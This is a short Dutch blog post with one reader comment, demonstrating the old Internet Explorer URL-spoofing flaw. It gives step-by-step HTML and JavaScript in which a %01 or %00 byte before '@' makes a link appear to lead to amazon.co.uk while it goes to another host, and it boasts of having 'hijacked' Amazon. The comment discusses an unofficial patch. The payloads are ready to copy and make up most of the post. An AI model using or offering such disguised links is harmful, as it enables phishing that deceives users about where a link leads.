Akelig

That’s some scary shit right there man:

  • maak een html-document aan, smijt daarin dit javascript:

    <script language=”javascript”>
    document.write(unescape(‘http://www.amazon.co.uk%01@www.zog.org’));
    </script>

  • opendoen in browser, en dan het resultaat copiëren, dat zou er iets in deze zin moeten uitzien (met zo’n blokje in het midden):

    http://www.amazon.co.uk@www.zog.org

  • gebruik de gekopieerde URL, met %01 proper geëncodeerd, in een andere html-file:

    <a href=”http://www.amazon.co.uk@www.zog.org”>gr8!</a>

  • in de statusbalk is de “echte” link nog wel zichtbaar, maar da’s ook rap verholpen door vóór de geëncodeerde %01 een %00 te zetten, alsdus:

    <a href=”http://www.amazon.co.uk%00@www.zog.org”>wassup?</a>

  • resultaat van al dat moois: yo check it — ik heb amazon gekaapt!

Doe mee met de conversatie

3 reacties

  1. http://slashdot.org/articles/03/12/19/0135211.shtml?tid=113&tid=126&tid=128&tid=172&tid=95

    Er is dus een open-source patch. De vraag is: hoe is de programmeur van die patch aan de source van IE geraakt? En bovendien is er het gerucht dat de patch er voor zorgt dat elke bezochte url gevalideerd wordt op een server, en bovendien zit er een buffer overflow in. Probleem: MS kan nu niet dezelfde code gebruiken om het probleem op te lossen. Dus het zal nog wel even duren voordat er een MS patch komt. Grm!

Laat een reactie achter

Zeg uw gedacht

Deze website gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.